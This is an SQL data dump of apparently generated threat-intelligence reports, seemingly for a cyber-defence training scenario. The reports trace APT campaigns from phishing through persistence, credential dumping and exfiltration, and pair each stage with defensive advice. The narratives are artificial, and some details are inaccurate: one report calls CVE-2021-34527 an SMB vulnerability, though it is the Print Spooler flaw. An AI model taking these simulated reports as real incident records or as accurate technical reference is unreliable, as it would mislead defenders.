(750, 151, 1325, 1, 'Initial Access: Analysis of Dropbox API Misuse', '### Overview\nAfter detecting suspicious activity involving the Dropbox API, further analysis has revealed that attackers are leveraging the API for unauthorized access. This method allows them to bypass traditional security measures by mimicking legitimate traffic.\n\n### Technical Details\n- **IP Addresses**: The suspicious activity is originating from IP addresses commonly associated with VPN services, indicating attempts to mask the attackers\' true location.\n- **API Calls**: Attackers are using a complex sequence of API calls to download and upload sensitive files.\n\n### Recommendations\n- **API Monitoring**: Implement more robust logging and monitoring of API calls.\n- **IP Filtering**: Block known malicious IP ranges associated with similar activities.\n\n### Next Steps\nPrepare for potential execution of malware, potentially xCaon, as the attackers establish a foothold.', '2026-03-01 22:55:55'),
(751, 151, 1326, 2, 'Execution Phase: xCaon Malware Analysis', '### Overview\nFollowing the initial access, our systems detected the execution of xCaon malware. This malware is known for its stealth capabilities and ability to evade detection.\n\n### Technical Details\n- **Payload Delivery**: xCaon was deployed via a disguised Dropbox link.\n- **Behavioral Analysis**: The malware exhibits polymorphic behavior, altering its code to avoid signature-based detection.\n\n### Recommendations\n- **Endpoint Detection**: Enhance endpoint security to detect anomalous behavior.\n- **File Integrity Monitoring**: Implement file integrity checks to detect unauthorized changes.\n\n### Next Steps\nInvestigate persistence mechanisms, as attackers may attempt to maintain their access through scheduled tasks or other methods.', '2026-03-01 22:55:55'),
(752, 151, 1327, 3, 'Persistence Mechanisms: Scheduled Tasks Identified', '### Overview\nAnalysis indicates that the attackers have established persistence on compromised systems using scheduled tasks, ensuring their malware remains active after reboots.\n\n### Technical Details\n- **Task Creation**: Malicious tasks are created to run xCaon malware at regular intervals.\n- **Obfuscation Techniques**: Task names and descriptions are designed to resemble legitimate system processes.\n\n### Recommendations\n- **Task Scheduler Audit**: Conduct regular audits of scheduled tasks for any unauthorized entries.\n- **User Training**: Educate users on recognizing and reporting suspicious system behavior.\n\n### Next Steps\nMonitor for lateral movement attempts, as attackers may seek to expand their access within the network.', '2026-03-01 22:55:55'),
(753, 151, 1328, 4, 'Lateral Movement Detected: Internal Network Breach', '### Overview\nUnauthorized access to internal networks has been detected, indicating the attackers are moving laterally to compromise additional systems.\n\n### Technical Details\n- **Compromised Credentials**: Attackers are using stolen credentials to access network resources.\n- **Network Traffic**: Unusual traffic patterns suggest data is being accessed from multiple endpoints.\n\n### Recommendations\n- **Network Segmentation**: Implement network segmentation to restrict lateral movement.\n- **Credential Management**: Enforce strong password policies and multi-factor authentication.\n\n### Next Steps\nFocus on detecting and preventing data exfiltration, as attackers are likely to attempt data theft via encrypted channels.', '2026-03-01 22:55:55'),
(754, 151, 1329, 5, NULL, NULL, '2026-03-01 22:55:55'),
(755, 153, 1330, 1, 'Investigation into Suspicious Phishing Email', '### Analysis of Initial Access Vector\n\nFollowing the detection of a suspicious phishing email targeting Israeli entities, further investigation has revealed that the email contained a malicious attachment designed to bypass standard security protocols. The attachment exploits a known vulnerability in outdated email clients, delivering a payload that establishes an initial foothold for the Agrius APT.\n\n#### Key Findings:\n- **Email Source:** Traced back to a compromised server in Eastern Europe.\n- **Payload Analysis:** The attachment is a macro-enabled document that, when opened, executes a PowerShell script to download additional malware components.\n\n#### Recommendations:\n- Update email client software to mitigate vulnerabilities.\n- Implement stricter email filtering to detect similar threats.', '2026-03-01 22:56:26'),
(756, 153, 1331, 2, 'Apostle Wiper Execution Attempt Analysis', '### Examination of Execution Tactics\n\nIn the wake of the Apostle wiper execution attempt, forensic analysis has provided insights into the methods employed by Agrius APT. The wiper was disguised as ransomware, demanding payment in cryptocurrency but primarily aimed at data destruction.\n\n#### Key Observations:\n- **Execution Method:** Utilizes scheduled tasks to trigger the wiper payload.\n- **Deceptive Tactics:** Mimics ransomware to confuse incident response teams and delay mitigation efforts.\n\n#### Mitigation Strategies:\n- Disable unused Windows services that could be exploited for scheduled tasks.\n- Enhance logging and monitoring to quickly detect similar execution patterns.', '2026-03-01 22:56:26'),
(757, 153, 1332, 3, 'Persistence Mechanism Discovered', '### Persistence Techniques of Agrius APT\n\nAfter analyzing the persistence mechanism deployed by Agrius APT, it has been determined that the threat actors utilize multiple strategies to maintain access to compromised systems.\n\n#### In-Depth Insights:\n- **Registry Modifications:** Alterations to Windows registry settings to ensure malware execution on startup.\n- **Scheduled Tasks:** New tasks created to periodically check-in with command and control servers.\n\n#### Defensive Measures:\n- Regular audits of registry changes and scheduled tasks.\n- Implement application whitelisting to prevent unauthorized changes.', '2026-03-01 22:56:26'),
(758, 153, 1333, 4, 'Lateral Movement Pathway Analysis', '### Understanding Lateral Movement Tactics\n\nThe identification of lateral movement pathways has revealed the sophisticated techniques employed by Agrius APT to spread within targeted networks.\n\n#### Pathway Analysis:\n- **Credential Dumping:** Obtaining credentials to access other systems within the network.\n- **Use of Admin Tools:** Leveraging legitimate administrative tools to move laterally without detection.\n\n#### Countermeasures:\n- Implement MFA (Multi-Factor Authentication) to protect sensitive accounts.\n- Monitor network traffic for unusual patterns indicative of lateral movement.', '2026-03-01 22:56:26'),
(759, 153, 1334, 5, NULL, NULL, '2026-03-01 22:56:26'),
(760, 154, 1335, 1, 'Analysis of Malicious PowerShell Script Execution', '# Overview\nFollowing the detection of a suspicious phishing email, further analysis has revealed that the email was designed to execute a PowerShell script upon opening a malicious attachment. This script is crafted to execute without raising suspicions by leveraging Living Off The Land Binaries (LOLBins).\n\n# Key Findings\n- The script uses obfuscation techniques to evade detection by traditional antivirus solutions.\n- It establishes a connection to a remote server, likely part of MuddyWater\'s Command and Control (C2) infrastructure.\n- The script is capable of downloading additional payloads to enhance its functionality.\n\n# Recommendations\n- Implement stricter email filtering rules to prevent similar phishing attempts.\n- Educate employees on recognizing phishing emails.\n- Monitor network traffic for unusual PowerShell activity.', '2026-03-01 22:56:56'),
(761, 154, 1336, 2, 'Persistence Mechanisms of MuddyWater\'s Backdoor', '# Overview\nAfter executing the malicious PowerShell script, a persistent backdoor has been established on the compromised systems. This backdoor allows MuddyWater to maintain access over extended periods.\n\n# Key Findings\n- Persistence is achieved by modifying registry entries to ensure the script runs at startup.\n- The backdoor is designed to blend in with legitimate system processes to avoid detection.\n- It has capabilities to receive commands from the C2 server for further exploitation.\n\n# Recommendations\n- Conduct regular audits of startup entries and services.\n- Employ endpoint detection and response (EDR) solutions to identify anomalies.\n- Regularly update and patch systems to prevent exploitation of known vulnerabilities.', '2026-03-01 22:56:56'),
(762, 154, 1337, 3, 'Unauthorized Network Access and Lateral Movement Tactics', '# Overview\nThe persistent backdoor has enabled MuddyWater to gain unauthorized access to the internal network. There are indicators of lateral movement as the threat actors explore the network.\n\n# Key Findings\n- MuddyWater is using legitimate credentials obtained through credential dumping to navigate the network.\n- Tools like PsExec and WMI are being leveraged to move laterally between systems.\n- Network mapping activities have been observed, likely for reconnaissance purposes.\n\n# Recommendations\n- Implement network segmentation to limit movement within the network.\n- Enforce multi-factor authentication (MFA) to enhance security of user accounts.\n- Monitor for unusual account activity and lock accounts showing suspicious behavior.', '2026-03-01 22:56:56'),
(763, 154, 1338, 4, 'Data Exfiltration Techniques Employed by MuddyWater', '# Overview\nEvidence suggests that MuddyWater has begun exfiltrating sensitive data from the compromised network. This data exfiltration is a critical phase of their operation.\n\n# Key Findings\n- Data is being compressed and encrypted before exfiltration to obscure its contents and evade detection.\n- Exfiltration is conducted over common protocols such as HTTP/HTTPS, making it difficult to differentiate from legitimate traffic.\n- Specific data types targeted include customer records and network infrastructure details.\n\n# Recommendations\n- Implement data loss prevention (DLP) solutions to detect and block unauthorized data transfers.\n- Inspect outbound traffic for anomalies in size and frequency.\n- Conduct a thorough review of access logs to identify compromised endpoints.', '2026-03-01 22:56:56'),
(764, 154, 1339, 5, NULL, NULL, '2026-03-01 22:56:56'),
(765, 155, 1340, 1, 'Analysis of Initial Access Tactics', '# Analysis of Initial Access Tactics\n\n## Overview\nFollowing the detection of a suspicious spear phishing email, further investigation has revealed the use of social engineering techniques to gain initial access. The email contained malicious attachments and links designed to lure employees into executing harmful scripts.\n\n## Key Findings\n- **Payload Delivery**: The email is crafted with industry-specific language to increase credibility.\n- **Targeted Sectors**: Primarily targeting oil, gas, and telecom sectors.\n- **Malware Analysis**: The malicious attachment is a downloader for DanBot malware.\n\n## Next Steps\nFocus on understanding the execution phase of DanBot to prevent further infiltration.', '2026-03-01 22:57:36'),
(766, 155, 1341, 2, 'Execution Phase of DanBot Malware', '# Execution Phase of DanBot Malware\n\n## Overview\nAfter initial access via spear phishing, the execution of DanBot malware was successfully detected. DanBot is being executed to establish a foothold within the network.\n\n## Key Findings\n- **Execution Method**: Utilizes PowerShell scripts to evade traditional antivirus detection.\n- **Obfuscation Techniques**: Employs code obfuscation to hinder analysis.\n- **Immediate Actions**: System scans indicate multiple instances of DanBot running on critical servers.\n\n## Next Steps\nInvestigate persistence mechanisms to understand how Lyceum maintains access to compromised systems.', '2026-03-01 22:57:36'),
(767, 155, 1342, 3, 'Persistence Mechanisms Uncovered', '# Persistence Mechanisms Uncovered\n\n## Overview\nPost-execution analysis revealed the establishment of persistence mechanisms by the DanBot malware to ensure continued access.\n\n## Key Findings\n- **Registry Alterations**: Modifications in registry keys to auto-start malware upon system boot.\n- **Scheduled Tasks**: Creation of hidden scheduled tasks for periodic execution.\n- **Fileless Persistence**: Using living-off-the-land techniques to avoid detection.\n\n## Next Steps\nFocus on detecting lateral movement and credential harvesting activities.', '2026-03-01 22:57:36'),
(768, 155, 1343, 4, 'Credential Harvesting Activities Detected', '# Credential Harvesting Activities Detected\n\n## Overview\nWith persistence established, Lyceum is actively harvesting credentials to move laterally within the network.\n\n## Key Findings\n- **Credential Dumping Tools**: Use of Mimikatz to extract passwords and hashes.\n- **Targeted Accounts**: High-value accounts with privileged access are being compromised.\n- **Network Traffic**: Increased anomalous traffic between critical nodes.\n\n## Next Steps\nPrepare for potential data exfiltration by monitoring data staging activities.', '2026-03-01 22:57:36'),
(769, 155, 1344, 5, 'Data Staging for Exfiltration Identified', '# Data Staging for Exfiltration Identified\n\n## Overview\nCredential harvesting success has enabled Lyceum to prepare sensitive data for exfiltration.\n\n## Key Findings\n- **Data Aggregation**: High-value data from oil, gas, and telecom sectors being consolidated.\n- **Staging Locations**: Temporary storage on compromised workstations identified.\n- **Encryption**: Data is being encrypted before exfiltration attempts.\n\n## Next Steps\nImmediate containment and monitoring of network egress points to prevent data exfiltration.', '2026-03-01 22:57:36'),
(770, 155, 1345, 6, NULL, NULL, '2026-03-01 22:57:36'),
(771, 156, 1346, 1, 'Phishing Analysis Unveiled', '## Phishing Analysis Unveiled\n\n**Context:** After detecting a suspicious email that potentially targeted South Korean entities, further analysis was conducted to dissect the email\'s components and intent.\n\n### Key Findings:\n- **Email Origin**: The email was traced back to a known IP address associated with previous Kimsuky operations.\n- **Content Analysis**: The email included a malicious attachment disguised as a PDF invoice, aimed at luring targets into executing the attached file.\n- **Targeted Entities**: Primarily aimed at South Korean defense contractors and government officials.\n\n### Next Steps:\n- Enhance email filtering systems to detect similar phishing attempts.\n- Educate potential targets on recognizing phishing emails.', '2026-03-01 23:01:17'),
(772, 156, 1347, 2, 'AppleSeed Backdoor: Infiltration and Installation', '## AppleSeed Backdoor: Infiltration and Installation\n\n**Context:** Following the phishing attack, the successful execution of the malicious attachment led to the installation of the AppleSeed backdoor on the compromised systems.\n\n### Key Insights:\n- **Malware Behavior**: Upon execution, the backdoor established a connection with a remote command-and-control server.\n- **Capabilities**: The backdoor allows for remote access, file manipulation, and system reconnaissance.\n- **Indicators of Compromise (IoCs)**: Specific file paths and registry keys were altered to facilitate the backdoor\'s operation.\n\n### Recommendations:\n- Conduct a thorough system scan to identify and remove the backdoor.\n- Update security protocols to prevent future installations.', '2026-03-01 23:01:17'),
(773, 156, 1348, 3, 'Persistence Mechanism Analysis', '## Persistence Mechanism Analysis\n\n**Context:** After the installation of the AppleSeed backdoor, a persistence mechanism was activated to ensure continued access to the compromised systems.\n\n### Mechanism Details:\n- **Registry Modifications**: The malware altered registry entries to execute the backdoor upon system start.\n- **Scheduled Tasks**: A scheduled task was created to periodically check and re-establish the backdoor\'s connection if disrupted.\n\n### Mitigation Strategies:\n- Regularly audit registry and task scheduler entries for unauthorized changes.\n- Implement endpoint detection and response (EDR) solutions to monitor and block persistence activities.', '2026-03-01 23:01:17'),
(774, 156, 1349, 4, 'Credential Harvesting Detected', '## Credential Harvesting Detected\n\n**Context:** As the operation progressed, signs of credential harvesting were detected, indicating an attempt to gain further access and control.\n\n### Observations:\n- **Keylogging Activity**: The backdoor included keylogging functionality to capture user credentials.\n- **Credential Dumping**: Tools were deployed to extract saved credentials from web browsers and password vaults.\n\n### Countermeasures:\n- Enforce multi-factor authentication (MFA) to limit the impact of credential theft.\n- Educate users on secure password practices and the risks of password reuse.', '2026-03-01 23:01:17'),
(775, 156, 1350, 5, NULL, NULL, '2026-03-01 23:01:17'),
(776, 157, 1351, 1, 'Phishing Email Campaign Analysis', '## Summary\nFollowing the detection of a phishing email, our analysis reveals that the email was crafted to appear as an internal memo regarding software updates. The email contained a malicious attachment disguised as a PDF file.\n\n## Technical Details\n- **Sender:** Spoofed internal address\n- **Attachment:** `update_instructions.pdf.exe`\n- **Target:** Employees in the finance department\n\n## Next Steps\nWith the execution of the malware likely through the attachment, it is imperative to monitor for any suspicious processes or unusual network traffic indicating malware execution.', '2026-03-01 23:01:37'),
(777, 157, 1352, 2, 'Malware Execution and Initial Payload', '## Summary\nThe execution of the malware was confirmed on several workstations. The initial payload was a downloader that fetched a more sophisticated second-stage malware.\n\n## Technical Details\n- **Initial Payload:** Downloader Trojan\n- **C2 Server:** `hxxp://malicious-server.com`\n- **Downloaded Malware:** Banking Trojan\n\n## Next Steps\nWith persistence mechanisms likely being established, it is crucial to inspect startup folders and scheduled tasks for unauthorized entries.', '2026-03-01 23:01:37'),
(778, 157, 1353, 3, 'Establishment of Persistence Mechanisms', '## Summary\nPersistence has been achieved via both registry run keys and scheduled tasks. This ensures the malware remains active even after system reboots.\n\n## Technical Details\n- **Registry Key:** `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater`\n- **Scheduled Task:** `System Maintenance`\n\n## Next Steps\nFocus shifts to detecting lateral movement within the network, as compromised hosts may attempt to access additional systems.', '2026-03-01 23:01:37'),
(779, 157, 1354, 4, 'Lateral Movement and Network Propagation', '## Summary\nLateral movement has been detected with the use of credential dumping tools and SMB exploitation.\n\n## Technical Details\n- **Tools Used:** Mimikatz for credential harvesting\n- **Exploitation Method:** SMB vulnerability (CVE-2021-34527)\n\n## Next Steps\nAttention must now focus on data exfiltration signs, particularly monitoring outbound network traffic for anomalies.', '2026-03-01 23:01:37'),
(780, 157, 1355, 5, NULL, NULL, '2026-03-01 23:01:37'),
(781, 158, 1356, 1, 'Analysis of Initial Access Tactics', '### Context\nFollowing the **Suspicious Access Attempt Detected** alert, our analysis suggests that the adversary leveraged spear-phishing emails to gain initial access. These emails contained links redirecting users to a malicious website mimicking legitimate cryptocurrency services.\n\n### TTPs Observed\n- **Spear-phishing Emails**: Crafted emails targeting key personnel within crypto startups.\n- **Malicious Links**: Embedded URLs leading to a clone site hosting the AppleJeus malware.\n\n### Next Steps\nEnhanced monitoring for execution of malware payloads is recommended to confirm adversary presence and prepare for subsequent alerts.', '2026-03-01 23:02:16'),
(782, 158, 1357, 2, 'Execution of Malicious Payload: AppleJeus Analysis', '### Context\nPost **Execution of Malicious Payload**, our investigation has identified the deployment of the AppleJeus malware variant. This variant uses a fake cryptocurrency application to execute its payload.\n\n### TTPs Observed\n- **Fake Cryptocurrency Application**: Disguised as legitimate software facilitating the Trojan\'s installation.\n- **Code Execution Techniques**: Utilizes DLL side-loading to evade detection.\n\n### Next Steps\nFocus on identifying persistence mechanisms to prevent the adversary from maintaining long-term access to compromised systems.', '2026-03-01 23:02:16'),
(783, 158, 1358, 3, 'Persistence Mechanisms Uncovered', '### Context\nIn response to **Establishing Persistence Mechanism**, we\'ve discovered that the adversary employs scheduled tasks and registry modifications to maintain persistence.\n\n### TTPs Observed\n- **Scheduled Tasks**: Regularly triggers the malicious payload to ensure execution even after system reboots.\n- **Registry Modifications**: Alters startup configurations to execute malware automatically.\n\n### Next Steps\nMonitor for lateral movement attempts to identify any expansion of adversary presence within the network.', '2026-03-01 23:02:16'),
(784, 158, 1359, 4, 'Lateral Movement: Network Propagation Analysis', '### Context\nFollowing the **Lateral Movement Detected** alert, analysis indicates the adversary utilizes credential dumping and stolen credentials for network propagation.\n\n### TTPs Observed\n- **Credential Dumping**: Utilizes tools like Mimikatz to extract login credentials.\n- **Remote Execution Tools**: Leverages legitimate tools such as PsExec for lateral movement.\n\n### Next Steps\nImplement strict data exfiltration monitoring to detect any unauthorized data transfers potentially leading to a breach.', '2026-03-01 23:02:16'),
(785, 158, 1360, 5, NULL, NULL, '2026-03-01 23:02:16'),
(786, 159, 1361, 1, 'Analysis of Malware Installation via Trojanized Trading App', '### Overview\nAfter the initial alert concerning the installation of the trojanized trading app, our analysis indicates that the app was disguised as a legitimate cryptocurrency trading platform.\n\n### Findings\n- **Application Name**: CryptoTradePro\n- **Distribution Method**: Spear-phishing emails targeting cryptocurrency enthusiasts\n- **Malware Type**: Custom-built Trojan\n\n### Impact\nThe malware facilitates unauthorized access to the user\'s device, setting the stage for further exploitation.\n\n### Next Steps\nMonitor for execution of any Remote Access Trojans (RAT) that may leverage this initial foothold.', '2026-03-01 23:02:30');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(787, 159, 1362, 2, 'Execution of Remote Access Trojan (RAT) Detected', '### Overview\nFollowing the initial access, a Remote Access Trojan (RAT) was executed, gaining control over compromised systems.\n\n### Findings\n- **RAT Identified**: RAT-X v2.4\n- **Capabilities**: Keylogging, Screen Capture, Command Execution\n- **Command and Control Servers**: Traced to multiple IPs in Eastern Europe\n\n### Impact\nThe RAT enables attackers to execute commands remotely, potentially leading to information theft and further system compromise.\n\n### Next Steps\nInvestigate potential persistence mechanisms, including credential theft or other tactics used to maintain access.', '2026-03-01 23:02:30'),
(788, 159, 1363, 3, 'Credential Theft Mechanism Uncovered', '### Overview\nUpon execution of the RAT, attackers have implemented credential theft techniques to ensure persistence.\n\n### Findings\n- **Tools Used**: Mimikatz for credential dumping\n- **Targeted Data**: Cryptocurrency wallet keys, Exchange login credentials\n- **Persistence Method**: Scheduled tasks and registry modifications\n\n### Impact\nCompromised credentials allow attackers to maintain access and potentially move laterally within networks.\n\n### Next Steps\nBegin monitoring for lateral movement using compromised accounts and ensure defensive measures are in place.', '2026-03-01 23:02:30'),
(789, 159, 1364, 4, 'Lateral Movement and Account Compromise', '### Overview\nAttackers have begun using compromised accounts to move laterally within targeted organizations.\n\n### Findings\n- **Movement Technique**: Pass-the-Hash and Pass-the-Ticket\n- **Compromised Accounts**: Admin-level accounts in several cryptocurrency exchanges\n- **New Objectives**: Access to internal financial systems\n\n### Impact\nIncreased risk of significant data exfiltration and asset theft.\n\n### Next Steps\nFocus on detecting and preventing exfiltration of cryptocurrency assets, while working to secure all compromised accounts.', '2026-03-01 23:02:30'),
(790, 159, 1365, 5, NULL, NULL, '2026-03-01 23:02:30'),
(791, 160, 1366, 1, 'Investigation of Suspicious LinkedIn Profile', '# Investigation of Suspicious LinkedIn Profile\n\n**Background:**\nFollowing the alert of a suspicious LinkedIn connection request, an investigation was launched to analyze the profile of the individual claiming to be a recruiter for an aerospace company.\n\n**Findings:**\n- The LinkedIn profile was recently created with limited connections and activity.\n- The profile picture was identified as a stock image, commonly used in fraudulent schemes.\n- Past employment history was inconsistent and unverifiable.\n\n**Implications:**\nThe profile exhibits classic signs of a social engineering attempt, likely aimed at targeting aerospace engineers with fake job offers.\n\n**Next Steps:**\nMonitor for any subsequent communication attempts from this profile or similar entities.', '2026-03-01 23:03:23'),
(792, 160, 1367, 2, 'Analysis of Malicious Email Attachment', '# Analysis of Malicious Email Attachment\n\n**Background:**\nA follow-up email was sent by the suspicious LinkedIn profile, containing an attachment that purportedly included a job description.\n\n**Findings:**\n- The attachment was a disguised executable file with a double extension (e.g., .pdf.exe).\n- Analysis revealed the presence of a macro that, when enabled, downloads additional malware.\n- The payload was identified as a Remote Access Trojan (RAT), aimed at establishing unauthorized access to the victim\'s system.\n\n**Implications:**\nThis attachment is designed to compromise the system of aerospace engineers, granting attackers remote control capabilities.\n\n**Next Steps:**\nStrengthen email filtering protocols and educate users about recognizing and handling phishing attempts.', '2026-03-01 23:03:23'),
(793, 160, 1368, 3, 'Detection of Remote Access Trojan (RAT) Activity', '# Detection of Remote Access Trojan (RAT) Activity\n\n**Background:**\nFollowing the execution of the malicious attachment, network monitoring tools detected suspicious activity indicative of a RAT.\n\n**Findings:**\n- Unusual outbound traffic was observed, consistent with RAT communication patterns.\n- Multiple attempts to escalate privileges were detected, signaling the RAT\'s efforts to gain deeper access.\n- The malware established persistence by modifying startup entries.\n\n**Implications:**\nThe RAT poses a significant threat, capable of remote control, data theft, and lateral network movement.\n\n**Next Steps:**\nInitiate containment and eradication procedures, and perform a comprehensive network sweep to identify additional infections.', '2026-03-01 23:03:23'),
(794, 160, 1369, 4, 'Lateral Movement and Network Segment Compromise', '# Lateral Movement and Network Segment Compromise\n\n**Background:**\nPost-RAT deployment, there were signs of lateral movement within the network, targeting secure segments.\n\n**Findings:**\n- Unauthorized access attempts were identified on systems within the secure network segments.\n- Credentials were harvested from compromised machines, facilitating the lateral spread.\n- Systems housing sensitive aerospace data were specifically targeted.\n\n**Implications:**\nThe adversary\'s ability to navigate the network poses a substantial risk to sensitive data and operational security.\n\n**Next Steps:**\nImplement network segmentation and tighten access controls to prevent further lateral movement.', '2026-03-01 23:03:23'),
(795, 160, 1370, 5, 'Data Exfiltration Attempt and Command & Control Link', '# Data Exfiltration Attempt and Command & Control Link\n\n**Background:**\nAn attempt to exfiltrate sensitive data was detected, coinciding with communication to known North Korean IP addresses.\n\n**Findings:**\n- Data packets were identified leaving the network, disguised as normal web traffic.\n- The destination IPs are associated with previous Lazarus Group activities.\n- Command and Control (C2) instructions were traced back to these IPs, confirming the link.\n\n**Implications:**\nThe operation is consistent with Lazarus Group\'s tactics, techniques, and procedures (TTPs), posing a serious threat to national aerospace security.\n\n**Next Steps:**\nCoordinate with national cybersecurity agencies for a comprehensive response and consider legal actions against identified adversarial entities.', '2026-03-01 23:03:23'),
(796, 160, 1371, 6, NULL, NULL, '2026-03-01 23:03:23'),
(797, 161, 1443, 1, 'Analysis of Spear Phishing Tactics', '### Overview\nFollowing the detection of initial access through spear phishing, this report delves into the tactics employed by the Lazarus Group to compromise targets within the aerospace sector.\n\n### Key Findings\n- **Target Identification:** The Lazarus Group meticulously selected high-value targets within aerospace companies, focusing on those with access to sensitive information.\n- **Phishing Content:** Emails often mimicked legitimate aerospace industry communications, utilizing industry-specific jargon and references to ongoing projects.\n- **Attachments:** Malicious attachments, often disguised as PDF files related to aerospace contracts or technical documents, were the primary vehicle for malware delivery.\n\n### Implications\nThe use of highly targeted spear phishing attacks underscores the need for robust email filtering and user training to recognize and report suspicious communications.\n\n### Next Steps\nPrepare for the potential execution of custom Mac malware, which is likely embedded within the malicious attachments.', '2026-03-03 22:01:10'),
(798, 161, 1444, 2, 'Unveiling Custom Mac Malware Deployment', '### Overview\nThis report provides an in-depth analysis of the custom Mac malware deployed by the Lazarus Group, following successful spear phishing attacks.\n\n### Key Features of the Malware\n- **Stealth:** The malware employs advanced obfuscation techniques to evade detection by standard antivirus solutions.\n- **Capabilities:** It is designed to exfiltrate sensitive data, including aerospace project files, and can perform keylogging and screenshot captures.\n- **Command and Control:** The malware communicates with C2 servers using encrypted channels, making traffic analysis challenging.\n\n### Indicators of Compromise\n- **File Hashes:** The malware variants have specific SHA-256 hashes, critical for identifying infected systems.\n- **Network Traffic:** Unusual outbound traffic patterns to known malicious IP addresses have been observed.\n\n### Implications\nThe deployment of this sophisticated malware signifies a high level of threat actor motivation and capability, necessitating immediate containment and remediation measures.\n\n### Next Steps\nFocus will shift to identifying how the malware establishes persistence and begins lateral movement within compromised networks.', '2026-03-03 22:01:10'),
(799, 161, 1445, 3, NULL, NULL, '2026-03-03 22:01:10'),
(800, 162, 1446, 1, 'Analysis of Suspicious App Download', '### Overview\nThe initial alert was triggered by the download of a suspicious application. This application is believed to be a Trojanized version of a legitimate crypto trading app, potentially linked to the Lazarus Group.\n\n### Key Findings\n- **Origin**: The download was traced back to a known phishing domain masquerading as a popular crypto exchange.\n- **File Analysis**: Initial inspection suggests the presence of obfuscated code, likely designed to evade detection.\n\n### Next Steps\n- Conduct a deeper analysis of the application\'s behavior post-installation to identify any unusual scripts or processes triggered by the app. This will help us prepare for potential execution attempts.', '2026-03-03 22:03:46'),
(801, 162, 1447, 2, 'Detection of Unknown Script Execution', '### Overview\nFollowing the download, several unknown scripts were executed on the target system. These scripts appear to facilitate the initial stages of the attack.\n\n### Key Findings\n- **Script Behavior**: The scripts initiated a series of system reconnaissance commands, likely gathering information about the macOS environment.\n- **Indicators of Compromise (IoCs)**: Several newly created files and modifications to existing system files were detected.\n\n### Next Steps\n- Investigate the method used to establish persistence within the system. This will involve monitoring for any changes in startup items or scheduled tasks.', '2026-03-03 22:03:46'),
(802, 162, 1448, 3, 'Persistence Mechanism Established', '### Overview\nThe adversary has successfully established a persistence mechanism, ensuring their continued access to the compromised system.\n\n### Key Findings\n- **Persistence Techniques**: Modifications to macOS launch agents and the creation of new login items were observed.\n- **Potential Backdoors**: Evidence suggests the installation of a backdoor to allow remote access even if the trojanized app is removed.\n\n### Next Steps\n- Focus on identifying any lateral movement activities originating from the compromised system. This will involve monitoring network traffic for unusual patterns and potential attempts to access other systems.', '2026-03-03 22:03:46'),
(803, 162, 1449, 4, 'Unauthorized Lateral Movement Attempt', '### Overview\nAn attempt was made to move laterally across the network from the compromised system. This indicates a potential expansion of the attack.\n\n### Key Findings\n- **Target Systems**: The attack targeted systems within the same network segment, focusing on those with admin privileges.\n- **Methods Used**: Exploitation of known vulnerabilities in outdated software versions was attempted.\n\n### Next Steps\n- Immediate containment measures are required to prevent sensitive data exfiltration. Enhanced monitoring of outbound traffic is necessary to detect any data transfers.', '2026-03-03 22:03:46'),
(804, 162, 1450, 5, NULL, NULL, '2026-03-03 22:03:46'),
(805, 163, 1451, 1, NULL, NULL, '2026-03-07 00:50:13'),
(806, 163, 1452, 2, 'Malicious Document Execution Unveiled', '## Context\nAfter detecting the spear-phishing email, further analysis revealed that the email contained a link to a malicious document disguised as an official communication from a well-known financial institution.\n\n## Insight\nThe document exploited a known vulnerability in an outdated version of a popular document viewer installed on many systems within the targeted cryptocurrency exchanges. Once opened, it initiated the download and execution of a payload designed to establish a foothold in the network.\n\n## Next Steps\nTeams should implement immediate patches to all document viewers and monitor for any signs of unauthorized document execution across the network.', '2026-03-07 00:50:13'),
(807, 163, 1453, 3, 'Credential Harvesting via Password Manager Exploit', '## Context\nFollowing the execution of the malicious document, an alert was triggered indicating potential credential harvesting activities.\n\n## Insight\nThe malware deployed targeted vulnerabilities in popular password managers used within the exchanges. By exploiting these weaknesses, the attackers were able to extract stored credentials from compromised systems, gaining access to sensitive accounts.\n\n## Recommendations\nUrgently review and update password manager software configurations, enforce multi-factor authentication, and conduct a comprehensive audit of access logs to identify unauthorized access attempts.', '2026-03-07 00:50:13'),
(808, 163, 1454, 4, 'Lateral Movement Detected Within Internal Network', '## Context\nPost credential harvesting, the attackers utilized the compromised credentials to move laterally across the internal network of the cryptocurrency exchanges.\n\n## Insight\nUsing legitimate credentials, the threat actors accessed additional systems and expanded their footprint. This movement was aimed at identifying systems with higher privileges or direct access to cryptocurrency wallets.\n\n## Mitigation\nImmediate containment measures should be enacted, including isolating affected systems, revoking all compromised credentials, and conducting a thorough investigation to map the extent of the penetration.', '2026-03-07 00:50:13'),
(809, 163, 1455, 5, 'Data Exfiltration Attempt Thwarted', '## Context\nThe culmination of the operation was an attempt to exfiltrate valuable data, including private keys and sensitive financial information, from the compromised exchanges.\n\n## Insight\nThe data exfiltration attempt was detected through anomaly detection systems monitoring unusual outbound traffic patterns. This activity suggested the use of encrypted channels to transfer data to external servers controlled by the attackers.\n\n## Actionable Steps\nEnhance network monitoring capabilities, deploy data loss prevention solutions, and conduct regular security drills to improve response times. Additionally, work with law enforcement to track and take down attacker infrastructure.', '2026-03-07 00:50:13'),
(810, 164, 1456, 1, 'Initial Access Analysis', '## Overview\nAfter the detection of suspicious access to the transaction switch, further analysis revealed that the unauthorized activity likely originated from a compromised employee account. The account was used to exploit a vulnerability in the switch\'s authentication module.\n\n## Technical Details\n- **Vulnerability Exploited:** A weak password policy enabled brute force attacks.\n- **Entry Point:** External IP address traced to a location in Eastern Europe.\n- **Tools Used:** Custom scripts were deployed to maintain low-profile access.\n\n## Recommendations\n- **Immediate Action:** Revise and enforce a robust password policy.\n- **Monitoring:** Enhance logging on transaction switch access points.\n\n## Next Steps\nPrepare for potential malicious code execution, as APT38 typically follows initial access with malware deployment.', '2026-03-07 00:50:56'),
